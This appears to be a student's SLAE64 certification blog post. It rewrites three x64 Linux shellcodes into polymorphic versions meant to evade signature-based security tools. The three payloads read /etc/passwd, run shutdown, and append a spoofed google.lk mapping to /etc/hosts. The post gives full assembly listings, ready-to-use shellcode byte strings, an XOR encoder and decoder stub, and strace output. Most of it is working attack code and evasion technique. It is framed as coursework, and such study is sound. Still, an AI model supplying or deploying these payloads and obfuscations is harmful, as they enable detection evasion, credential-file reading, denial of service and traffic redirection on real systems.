After completing the video lectures of the SecurityTube Linux Assembly Expert 64-bit course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment: take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.
While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade basic security tools that use signature-based matching to recognise threats. The assignment also requires each new version to stay within 150% of the original payload size.
Dump Password Payload
As most of the previous assignments have focused on network operations, I chose the first shellcode sample because it used file I/O.
The starting point is Mr.Un1k0d3r’s Read /etc/passwd payload which is 82 bytes in size:
BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start
section .text
_start:
jmp _push_filename
_readfile:
; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41
xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag
syscall
; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax
syscall
; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1
syscall
; syscall exit
xor rax, rax
add al, 60
syscall
_push_filename:
call _readfile
path: db "/etc/passwdA"
The original code uses the jump, call, pop method to locate the address of the ‘/etc/passwd’ string at the end of the payload. We can mutate this by converting the string into hex numbers and pushing them onto the stack. This involves breaking the string into 8 byte chunks, pushing the last chunk first, and writing each chunk as a little-endian value, which is why the constants look like the string reversed. We can’t include the NULL terminator directly because it would put a zero byte in the shellcode, so we’ll use a value of 0x1 and fix it afterwards.
push 0x01647773 ; 0x01 + dws
mov rbx, 0x7361702f6374652f ; sap/cte/
push rbx
mov rdi, rsp ; Get address of path string
dec byte [rdi+11] ; NULL byte fix
This change saves 2 bytes and splits the path into two fragments, so the contiguous ‘/etc/passwd’ string no longer appears in the shellcode.
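The push constants can be generated rather than worked out by hand. The sketch below is a hypothetical helper (`path_to_pushes` is not part of the original write-up); it assumes the final partial chunk is at most 4 bytes so it fits a sign-extended `push imm32`, as ‘swd\x01’ does here.

```python
def path_to_pushes(path, pad=0x01):
    """Return the immediates to push for `path`, in push order.

    The string is padded with `pad` instead of a NUL terminator and split
    into 8-byte chunks. Each chunk is read as a little-endian integer, which
    is why the hex constants look like the string reversed.
    Assumption: the last chunk is <= 4 bytes with its top byte < 0x80, so it
    can be pushed as a sign-extended imm32 without disturbing the upper bytes.
    """
    data = path.encode() + bytes([pad])
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    values = [int.from_bytes(chunk, "little") for chunk in chunks]
    # The chunk that ends up at the highest address must be pushed first.
    return values[::-1]


for value in path_to_pushes("/etc/passwd"):
    print(f"0x{value:016x}" if value > 0xFFFFFFFF else f"0x{value:08x}")
```

For ‘/etc/passwd’ this reproduces the two constants used above, and the pad byte sits at offset 11, matching `dec byte [rdi+11]`.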
The remainder of the first section sets the parameters for the SYS_OPEN syscall. We can modify these and save another 2 bytes:
push 2
sub rsi, rsi ; set O_RDONLY flag
pop rax
syscall
The next section of the payload uses SYS_READ to read the content of the file into a buffer of 0xfff (4095 decimal) bytes allocated on the stack. There isn’t much to work with here, but we can optimise the parameter shuffling by swapping in registers already known to be zero instead of XORing, and use a subtraction to hide the 0xfff value.
push rax ; Save file handle
xchg rsi, rax ; Zero out RAX
push rax
pop rdx
pop rdi
sub dx, 0xf001
sub rsp, rdx ; Make room on the stack
lea rsi, [rsp] ; Pass the buffer address
syscall
These changes save a further 4 bytes.
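The `sub dx, 0xf001` trick relies on 16-bit wraparound. A quick way to convince yourself is to emulate just the arithmetic in Python; this sketch ignores CPU flags and assumes DX is zero beforehand, as it is after `push rax; pop rdx`.

```python
def sub16(a, b):
    """Emulate `sub dx, imm16`: the result wraps modulo 2**16."""
    return (a - b) & 0xFFFF


imm = 0xF001
buf_size = sub16(0, imm)         # DX starts at 0
print(hex(buf_size), buf_size)   # size passed to sys_read

# The immediate is emitted little-endian as 01 f0: no NUL bytes, and the
# literal 0xfff never appears in the shellcode.
encoded = imm.to_bytes(2, "little")
print(encoded.hex(" "))
```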
The third section uses SYS_WRITE to dump the data from the stack buffer to STDOUT. Again, there isn’t much to work with, but by optimising the parameters we can save 8 bytes:
push 1
pop rdx
xchg rax, rdx ; syscall id and read size
push rax
pop rdi ; fd id
syscall
The last section is a simple SYS_EXIT; all we can do here is save a couple of bytes:
push 60
pop rax
syscall
Putting the whole thing together gives us pw_dump.nasm:
global _start
section .text
_start:
push 0x01647773 ; 0x01 + dws
mov rbx, 0x7361702f6374652f
push rbx
mov rdi, rsp ; Get addr of path string
dec byte [rdi+11] ; NULL byte fix
push 2
sub rsi, rsi ; set O_RDONLY flag
pop rax
syscall ; sys_open
push rax ; Save file handle
xchg rsi, rax ; Zero out RAX
push rax
pop rdx
pop rdi ; File ID
sub dx, 0xf001
sub rsp, rdx ; Make room on the stack
lea rsi, [rsp] ; Pass the buffer address
syscall ; sys_read
push 1
pop rdx
xchg rax, rdx ; syscall id and read size
push rax
pop rdi ; STDOUT (1)
syscall ; sys_write
push 60
pop rax
syscall ; sys_exit
Extracting the payload results in a 64 byte shellcode string; a saving of 18 bytes:
"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02"
"\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f"
"\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24"
"\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a"
"\x3c\x58\x0f\x05"
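The size, the absence of NULL bytes and the string splitting can be double-checked with a few lines of Python. This is a sketch; the byte string is copied from the output above. Note that the fragments ‘/etc/pas’ and ‘swd’ are still visible, because a little-endian immediate stores its bytes in string order.

```python
shellcode = (
    b"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f"
    b"\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02"
    b"\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f"
    b"\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24"
    b"\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a"
    b"\x3c\x58\x0f\x05"
)

print(len(shellcode))                  # payload size in bytes
print(b"\x00" in shellcode)            # any NULL bytes?
print(b"/etc/passwd" in shellcode)     # full path still contiguous?
print(b"/etc/pas" in shellcode)        # the 8-byte fragment remains
```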
Shutdown
The next shellcode sample to be tackled is shutdown -h now by Osanda Malith Jayathissa which is a 65 byte payload.
; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
xor rax, rax
xor rdx, rdx
push rax
push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp
push rax
push word 0x682d ;-h
mov rcx, rsp
push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp
push rdx
push rbx
push rcx
push rdi
mov rsi, rsp
add rax, 59
syscall
There is another version of this code from another SLAE student on the ShellStorm site which is 1 byte smaller and uses some payload encoding. I decided to start with the original and see what I could do.
The code is an execve call to the system’s shutdown command. At the start, the RAX and RDX registers are cleared. RDX isn’t used until the end, where it becomes a syscall parameter, while RAX is only used to push zeros onto the stack until it is loaded with the syscall number at the end. Clearing both seems wasteful, so we’ll clear just RDX, use it for the zero pushes, and worry about RAX later.
_start:
xor rdx, rdx
push rdx
The first PUSH adds a NULL to terminate the argument array which will be built in the next steps.
The next three sections push the argument strings onto the stack. As we’re working through the argument array in reverse, the ‘now’ string is the first one pushed.
The original code pushes hexadecimal values to build the strings. I decided to use bitwise NOT inverted strings throughout the code to hide the content. This conceals the string values in the raw shellcode and gets around the NULL byte problem at the same time, because each 0x00 terminator becomes 0xff. However, pushing and NOTing the strings one at a time bloated the shellcode up to about 82 bytes.
...
push dword 0xffffffffff889091 ; inverse of 'now\x00'
not qword [rsp]
push rsp
pop rbx
...
A second attempt at pushing the inverted strings and running a NOT loop over the stack afterwards got the code down to 76 bytes, but this was still not good enough. Some restructuring is required.
First, we define our inverted strings as data bytes and get the address using the jump, call, pop method:
jmp _str ; Get addr of strings in RAX
_build:
pop rax
...
_str:
call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h: db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
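The db lines above can be generated with a short Python sketch. The helper name `not_encode` is hypothetical; it NOTs each character plus its terminator and records the offset of each string, which gives the displacements for the `lea` instructions and the length for the decode loop.

```python
def not_encode(s):
    """Bitwise-NOT each byte of `s` plus its NUL terminator (0x00 -> 0xff)."""
    return bytes(~b & 0xFF for b in s.encode() + b"\x00")


args = ["now", "-h", "/sbin/shutdown"]   # same order as the db lines
blob = b""
offsets = []
for arg in args:
    offsets.append(len(blob))            # displacement for lea rdi, [rax+N]
    encoded = not_encode(arg)
    print(f"offset {len(blob)}: db " + ", ".join(f"0x{b:02x}" for b in encoded))
    blob += encoded

print("loop count:", hex(len(blob)))     # value loaded into RCX
```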
With the start address of the data in RAX, we can build the argument array on the stack and store its address in RSI ready for the execve syscall:
push rax ; 'now'
lea rdi, [rax+4] ; '-h'
push rdi
lea rdi, [rax+7] ; '/sbin/shutdown'
push rdi
push rsp ; Save arg array addr
pop rsi
Using RDI for the effective address calculations also means that the command string for the syscall is populated at this point.
The strings are still encoded, but we can run a NOT loop over the 0x16 (22) bytes of data starting at the address in RAX:
push 0x16
pop rcx
_decode:
not byte [rax]
inc rax
loop _decode
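To see what the loop leaves in memory, here is a small Python emulation of the `not byte [rax]; inc rax; loop` sequence. It is a sketch of the register behaviour only: `loop` decrements RCX and branches while the result is non-zero, so with RCX = 0x16 the body runs exactly 22 times.

```python
def not_decode(data, count):
    """Emulate the NOT decode loop over `count` bytes starting at RAX = 0."""
    buf = bytearray(data)
    rax, rcx = 0, count
    while True:
        buf[rax] = ~buf[rax] & 0xFF   # not byte [rax]
        rax += 1                      # inc rax
        rcx -= 1                      # loop: decrement RCX...
        if rcx == 0:                  # ...and fall through when it hits zero
            break
    return bytes(buf)


encoded = bytes([
    0x91, 0x90, 0x88, 0xff,
    0xd2, 0x97, 0xff,
    0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97,
    0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff,
])
decoded = not_decode(encoded, 0x16)

# argv as execve sees it: pointers at RAX+7, RAX+4 and RAX.
argv = [decoded[o:decoded.index(0, o)] for o in (7, 4, 0)]
print(argv)
```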
RDI and RSI now point to the decoded strings and RDX was cleared at the start, so all that remains is to load the execve syscall number (59, or 0x3b) into RAX and trigger the syscall:
push 0x3b
pop rax
syscall
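The complete listing of shutdown.nasm is pretty compact. Because the decode loop rewrites the string bytes in place, the section is declared writable as well as executable: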
global _start
section .TEXT exec write
_start:
xor rdx, rdx
push rdx ; NULL to terminate arg array
jmp _str ; Get addr of strings in RAX
_build:
pop rax
; Load string addresses onto stack
push rax ; 'now'
lea rdi, [rax+4] ; '-h'
push rdi
lea rdi, [rax+7] ; '/sbin/shutdown'
push rdi
push rsp ; Save arg array addr
pop rsi
; Decode strings
push 0x16
pop rcx
_decode:
not byte [rax]
inc rax
loop _decode
push 0x3b
pop rax
syscall
_str:
call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h: db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
Shellcode extraction results in a 62 byte string, just squeezing under the original (65 bytes) and alternative (64 bytes) implementations.
"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78"
"\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16"
"\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58"
"\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff"
"\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97"
"\x8a\x8b\x9b\x90\x88\x91\xff";
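The jump and call displacements are where NULL bytes usually sneak into jmp/call/pop code, so it is worth checking them. This Python sketch (byte string copied from above; offsets 4 and 35 are read off the listing) confirms the length, the absence of NULLs, and that the forward `jmp` lands on the `call` while the backward `call` lands on `pop rax`.

```python
import struct

shellcode = (
    b"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78"
    b"\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16"
    b"\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58"
    b"\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff"
    b"\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97"
    b"\x8a\x8b\x9b\x90\x88\x91\xff"
)
print(len(shellcode), b"\x00" in shellcode)

# jmp _str is at offset 4 (EB 1D); rel8 counts from the next instruction (6).
jmp_target = 6 + struct.unpack_from("<b", shellcode, 5)[0]
# call _build is at offset 35 (E8 + rel32); rel32 counts from offset 40.
call_target = 40 + struct.unpack_from("<i", shellcode, 36)[0]
print("jmp ->", jmp_target, "call ->", call_target)
```

The backward call’s displacement is negative (0xffffffde), so its upper bytes are 0xff rather than 0x00.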
Add Host Mapping
For the last example I decided to try another file-based payload: Add map in /etc/hosts file, also by Osanda Malith Jayathissa. This is a 110 byte payload that adds a spoofed mapping to the /etc/hosts file, allowing redirection of network traffic.
; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)
global _start
section .text
_start:
;open
xor rax, rax
add rax, 2 ; open syscall
xor rdi, rdi
xor rsi, rsi
push rsi ; 0x00
mov r8, 0x2f2f2f2f6374652f ; ////cte/
mov r10, 0x7374736f682f2f2f ; stsoh///
push r10
push r8
add rdi, rsp
xor rsi, rsi
add si, 0x401
syscall
;write
xchg rax, rdi
xor rax, rax
add rax, 1 ; syscall for write
jmp data
write:
pop rsi
mov dl, 19 ; length in rdx
syscall
;close
xor rax, rax
add rax, 3
syscall
;exit
xor rax, rax
mov al, 60
xor rdi, rdi
syscall
data:
call write
text db '127.1.1.1 google.lk'
For this exercise I decided to use a different method of string referencing. A CALL instruction can be used to jump over an inline string while helpfully placing the string’s address on the stack. Unfortunately, a near CALL in 64-bit mode always encodes a 32-bit displacement (5 bytes in total), so a short forward CALL leaves zero bytes in the upper part of the displacement. This is normally handled by jumping backwards, which produces a negative displacement padded with 0xff bytes instead, but in this example we’ll try something else.
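The zero bytes come straight from the rel32 encoding. The sketch below encodes `call rel32` (opcode E8, displacement measured from the end of the 5-byte instruction); the forward addresses match the disassembly that follows, while the backward call target is purely hypothetical, included for comparison.

```python
import struct


def call_rel32(call_addr, target):
    """Encode `call rel32`: E8 followed by a signed little-endian
    displacement relative to the address after the instruction."""
    return b"\xe8" + struct.pack("<i", target - (call_addr + 5))


forward = call_rel32(0x600080, 0x600090)    # jump over an 11-byte string
backward = call_rel32(0x600090, 0x600078)   # hypothetical backward call
print(forward.hex(" "), b"\x00" in forward)
print(backward.hex(" "), b"\x00" in backward)
```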
In the first section where we call the SYS_OPEN syscall, the path string can be incorporated into the code with a CALL. This really helps reduce the size of the final shellcode:
; open
xor rsi, rsi
add si, 0x401 ; O_WRONLY|O_APPEND flags
call _jump1
db '/etc/hosts', 0x00
_jump1:
pop rdi ; path reference
push 2
pop rax
syscall
However, the disassembly shows the zeros introduced by the CALL instruction:
0000000000600078 <_start>:
600078: 48 31 f6 xor rsi,rsi
60007b: 66 81 c6 01 04 add si,0x401
600080: e8 0b 00 00 00 call 600090 <_jump1>
600085: 2f 65 74 63 ... (bad)
...
0000000000600090 <_jump1>:
600090: 5f pop rdi
600091: 6a 02 push 0x2
600093: 58 pop rax
600094: 0f 05 syscall
To solve this and obscure the string contents, we will encode the entire payload and write a small decoder header.
The remainder of the code is quite straightforward and we can make some quick optimisations to bring the size down.
The final pre-encoding version is addhost_pre_encode.nasm:
global _start
section .text
_start:
; open
xor rsi, rsi
add si, 0x401 ; O_WRONLY|O_APPEND flags
call _jump1
db '/etc/hosts', 0x00
_jump1:
pop rdi ; path reference
push 2
pop rax
syscall
; write
xchg rax, rdi
push 1
pop rax ; syscall for write
call _jump2
db '127.1.1.1 google.lk', 0xa
_jump2:
pop rsi
push 20 ; data length in rdx
pop rdx
syscall
;close
push 3
pop rax
syscall
;exit
push 60
pop rax
syscall
The optimisations have squeezed the code down to 76 bytes, leaving 34 bytes for the decoder stub if the encoded version is to stay under the original 110 bytes.
A simple one byte XOR encoding of the shellcode requires a few lines of Python:
MBP:slae64$ python
Python 2.7.3 (default, Oct 26 2016, 21:01:49)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> payload = [0x48,0x31,0xf6,0x66,0x81,0xc6,0x01,0x04,0xe8,0x0b,0x00,0x00,0x00,0x2f,0x65, ...
>>> for b in payload:
... sys.stdout.write(hex(b ^ 0x41) + ',')
...
0x9,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a,0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,
0x2e,0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44,0x9,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,
0x41,0x41,0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61,0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,
0x2d,0x2a,0x4b,0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e,0x44,0x2b,0x7d,0x19,0x4e,0x44,
>>>
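A Python 3 equivalent of the session above might also format the result as NASM db lines and reject a key that would produce a NULL byte. The helper names are hypothetical, and because the full payload list is elided above, the sketch only uses the 15 bytes that are shown.

```python
def xor_encode(payload, key=0x41):
    """XOR every byte with `key`; refuse keys that would create a NULL."""
    encoded = bytes(b ^ key for b in payload)
    if 0 in encoded:
        raise ValueError(f"key 0x{key:02x} produces a NULL byte")
    return encoded


def to_db_lines(data, per_line=10):
    """Format bytes as NASM `db` lines, `per_line` values per line."""
    return [
        "db " + ",".join(f"0x{b:02x}" for b in data[i:i + per_line])
        for i in range(0, len(data), per_line)
    ]


# Only the first 15 payload bytes are shown in the session above.
prefix = bytes([0x48, 0x31, 0xf6, 0x66, 0x81, 0xc6, 0x01, 0x04,
                0xe8, 0x0b, 0x00, 0x00, 0x00, 0x2f, 0x65])
for line in to_db_lines(xor_encode(prefix)):
    print(line)
```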
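The decoder header uses a jump, call and pop to get the address of the payload, then a simple bytewise XOR loop to decode the data. As with the shutdown example, the loop modifies the payload in place, so the code must run from writable memory.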
_start:
jmp _code_marker ; Get the payload address
_decode:
pop rax
push 76 ; Payload length (loop counter)
pop rcx
_decode_loop:
xor byte [rax], 0x41
inc rax
loop _decode_loop
jmp _payload ; Jump to decoded payload
_code_marker:
call _decode
_payload:
db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a
db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e
db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44
db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41
db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61
db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b
db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e
db 0x44,0x2b,0x7d,0x19,0x4e,0x44
There is a little bit of faff with labels on the payload: we must jump over the call _decode instruction to the _payload label after the decode loop completes, or we will get stuck in an endless decoder loop. Fortunately, labels don’t add to the size of the shellcode and short jumps are only two bytes.
This completes the addhost.nasm code. The final size of the shellcode is 97 bytes, well under the original, even with the added content obfuscation.
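Before running the binary, the decoder’s effect can be emulated in Python: XORing the 76 db bytes with 0x41 should give back the pre-encoding payload with both strings intact. This is a sketch; the byte list is copied from the listing, and the stub size is simply inferred as 97 - 76.

```python
encoded = bytes([
    0x09, 0x70, 0xb7, 0x27, 0xc0, 0x87, 0x40, 0x45, 0xa9, 0x4a,
    0x41, 0x41, 0x41, 0x6e, 0x24, 0x35, 0x22, 0x6e, 0x29, 0x2e,
    0x32, 0x35, 0x32, 0x41, 0x1e, 0x2b, 0x43, 0x19, 0x4e, 0x44,
    0x09, 0xd6, 0x2b, 0x40, 0x19, 0xa9, 0x55, 0x41, 0x41, 0x41,
    0x70, 0x73, 0x76, 0x6f, 0x70, 0x6f, 0x70, 0x6f, 0x70, 0x61,
    0x26, 0x2e, 0x2e, 0x26, 0x2d, 0x24, 0x6f, 0x2d, 0x2a, 0x4b,
    0x1f, 0x2b, 0x55, 0x1b, 0x4e, 0x44, 0x2b, 0x42, 0x19, 0x4e,
    0x44, 0x2b, 0x7d, 0x19, 0x4e, 0x44,
])

# Emulate the stub: xor byte [rax], 0x41 over RCX = 76 bytes.
decoded = bytes(b ^ 0x41 for b in encoded)

print(len(encoded), "payload bytes;", 97 - len(encoded), "bytes of stub")
print(b"/etc/hosts\x00" in decoded, b"127.1.1.1 google.lk\n" in decoded)
print(decoded[:3].hex(" "))   # first instruction: xor rsi, rsi
```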
We can test the operation of the shellcode using strace to confirm the syscalls:
MBP:slae64$ strace ./addhost
execve("./addhost", ["./addhost"], [/* 23 vars */]) = 0
open("/etc/hosts", O_WRONLY|O_APPEND) = 3
write(3, "127.1.1.1 google.lk\n", 20) = 20
close(3) = 0
_exit(3) = ?
MBP:slae64$
Conclusion
I have deliberately tried to select some different payloads in this assignment and I have used different techniques to add some variety to the results. This has been very useful in allowing me to experiment with some of the optimisations and tricks I have seen while studying the SLAE64 course.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE64-1471